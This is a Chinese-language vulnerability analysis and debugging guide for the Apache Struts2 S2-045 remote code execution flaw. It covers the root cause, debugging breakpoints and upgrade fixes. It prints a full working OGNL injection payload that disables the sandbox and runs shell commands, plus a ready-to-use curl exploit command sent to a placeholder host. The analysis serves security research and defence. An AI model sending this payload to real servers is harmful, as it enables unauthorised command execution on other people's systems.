Apache Struts2 S2-045漏洞分析与调试指南<\/h1>

漏洞概述<\/h2>

S2-045是Apache Struts2框架中的一个远程代码执行漏洞，影响版本包括：<\/p>

2.3.5 - 2.3.31<\/li>

2.5 - 2.5.10<\/li> <\/ul>

该漏洞允许攻击者通过构造恶意的Content-Type头，在目标服务器上执行任意命令。<\/p>

漏洞成因<\/h2>

漏洞的核心原因在于：<\/p>

当请求的Content-Type包含"multipart\/form-data"时，Struts2会使用JakartaMultiPartRequest进行解析<\/li>
在异常处理过程中，错误信息被捕获并传递给了OGNL表达式解析器<\/li>

攻击者可以通过构造恶意的OGNL表达式实现远程代码执行<\/li> <\/ol>

漏洞利用分析<\/h2>

典型Payload结构<\/h3>

%{<\/span>
<\/span><\/span>  (<\/span>#<\/span>dm=<\/span>@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS<\/span>).<\/span>
<\/span><\/span>  (<\/span>#<\/span>_memberAccess?(<\/span>#<\/span>_memberAccess=<\/span>#<\/span>dm):(<\/span>
<\/span><\/span>    (<\/span>#<\/span>container=<\/span>#<\/span>context[<\/span>'<\/span>com.<\/span>opensymphony<\/span>.<\/span>xwork2<\/span>.<\/span>ActionContext<\/span>.<\/span>container<\/span>'<\/span>]).<\/span>
<\/span><\/span>    (<\/span>#<\/span>ognlUtil=<\/span>#<\/span>container.<\/span>getInstance<\/span>(<\/span>@com.opensymphony.xwork2.ognl.OgnlUtil@class<\/span>)).<\/span>
<\/span><\/span>    (<\/span>#<\/span>ognlUtil.<\/span>getExcludedPackageNames<\/span>().<\/span>clear<\/span>()).<\/span>
<\/span><\/span>    (<\/span>#<\/span>ognlUtil.<\/span>getExcludedClasses<\/span>().<\/span>clear<\/span>()).<\/span>
<\/span><\/span>    (<\/span>#<\/span>context.<\/span>setMemberAccess<\/span>(<\/span>#<\/span>dm))<\/span>
<\/span><\/span>  )).<\/span>
<\/span><\/span>  (<\/span>#<\/span>cmd=<\/span>'<\/span>id'<\/span>).<\/span>
<\/span><\/span>  (<\/span>#<\/span>iswin=(<\/span>@java.lang.System@getProperty<\/span>(<\/span>'<\/span>os.<\/span>name<\/span>'<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>'<\/span>win'<\/span>))).<\/span>
<\/span><\/span>  (<\/span>#<\/span>cmds=(<\/span>#<\/span>iswin?{<\/span>'<\/span>cmd.<\/span>exe<\/span>','<\/span>\/<\/span>c'<\/span>,<\/span>#<\/span>cmd}:{<\/span>'<\/span>\/<\/span>bin\/<\/span>bash','<\/span>-<\/span>c'<\/span>,<\/span>#<\/span>cmd})).<\/span>
<\/span><\/span>  (<\/span>#<\/span>p=<\/span>new<\/span> java.<\/span>lang<\/span>.<\/span>ProcessBuilder<\/span>(<\/span>#<\/span>cmds)).<\/span>
<\/span><\/span>  (<\/span>#<\/span>p.<\/span>redirectErrorStream<\/span>(<\/span>true<\/span>)).<\/span>
<\/span><\/span>  (<\/span>#<\/span>process=<\/span>#<\/span>p.<\/span>start<\/span>()).<\/span>
<\/span><\/span>  (<\/span>#<\/span>ros=(<\/span>@org.apache.struts2.ServletActionContext@getResponse<\/span>().<\/span>getOutputStream<\/span>())).<\/span>
<\/span><\/span>  (<\/span>@org.apache.commons.io.IOUtils@copy<\/span>(<\/span>#<\/span>process.<\/span>getInputStream<\/span>(),<\/span>#<\/span>ros)).<\/span>
<\/span><\/span>  (<\/span>#<\/span>ros.<\/span>flush<\/span>())<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Payload解析<\/h3>


权限绕过部分<\/strong>：<\/p>

获取默认的OGNL成员访问权限(DEFAULT_MEMBER_ACCESS)<\/li>
清除OGNL的安全限制(excludedPackageNames和excludedClasses)<\/li>
设置新的成员访问权限<\/li>
<\/ul>
<\/li>

命令执行部分<\/strong>：<\/p>

检测操作系统类型(Windows或Linux)<\/li>
根据操作系统构造相应的命令执行参数<\/li>
创建ProcessBuilder执行命令<\/li>
将命令执行结果输出到HTTP响应中<\/li>
<\/ul>
<\/li>
<\/ol>
利用示例(CURL)<\/h3>
curl -i -s -k -X $'POST'<\/span> \
<\/span><\/span><\/span><\/span>    -H $'Content-Type: %{(#fuck=\'multipart\/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'id\').(#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(#cmds=(#iswin?{\'cmd.exe\',\'\/c\',#cmd}:{\'\/bin\/bash\',\'-c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'<\/span> \
<\/span><\/span><\/span><\/span>    -H $'Content-Length: 0'<\/span> \
<\/span><\/span><\/span><\/span>    $'http:\/\/target.com\/path\/'<\/span>
<\/span><\/span><\/code><\/pre>调试分析<\/h2>
关键调试点<\/h3>


请求处理入口<\/strong>：<\/p>

Struts2PrepareAndExecuteFilter<\/code> 是请求的入口点<\/li>
通过web.xml<\/code>配置拦截所有请求<\/li>
<\/ul>
<\/li>

Content-Type检查<\/strong>：<\/p>

检查请求头中是否包含"multipart\/form-data"<\/li>
如果包含，则使用JakartaMultiPartRequest<\/code>进行解析<\/li>
<\/ul>
<\/li>

OGNL解析入口<\/strong>：<\/p>

com.opensymphony.xwork2.util.TextParseUtil.translateVariables<\/code><\/li>
该方法负责解析字符串中的OGNL表达式(由${}或%{}包裹)<\/li>
<\/ul>
<\/li>

表达式执行<\/strong>：<\/p>

com.opensymphony.xwork2.ognl.OgnlUtil#compileAndExecute<\/code><\/li>
ognl.ASTVarRef#setValueBody<\/code><\/li>
这些方法最终执行OGNL表达式<\/li>
<\/ul>
<\/li>
<\/ol>
安全机制绕过原理<\/h3>

OgnlValueStack<\/code>通过setOgnlUtil<\/code>初始化securityMemberAccess<\/code><\/li>
攻击payload清除OGNL的安全限制：

excludedClasses<\/code><\/li>
excludedPackageNames<\/code><\/li>
excludedPackageNamePatterns<\/code><\/li>
<\/ul>
<\/li>
设置新的成员访问权限(setMemberAccess<\/code>)，绕过沙箱限制<\/li>
<\/ol>
修复建议<\/h2>

升级到Struts2的安全版本：

2.3.32或更高<\/li>
2.5.10.1或更高<\/li>
<\/ul>
<\/li>
临时缓解措施：

在web.xml中限制Content-Type头的格式<\/li>
使用WAF拦截包含恶意OGNL表达式的请求<\/li>
<\/ul>
<\/li>
<\/ol>
参考资源<\/h2>

Apache Struts2官方安全公告<\/a><\/li>
OGNL表达式注入技术分析<\/a><\/li>
Struts2架构与安全机制<\/a><\/li>
<\/ol>
通过深入理解S2-045漏洞的原理和利用方式，安全研究人员可以更好地防御此类漏洞，同时也为Struts2应用的安全开发提供参考。<\/p>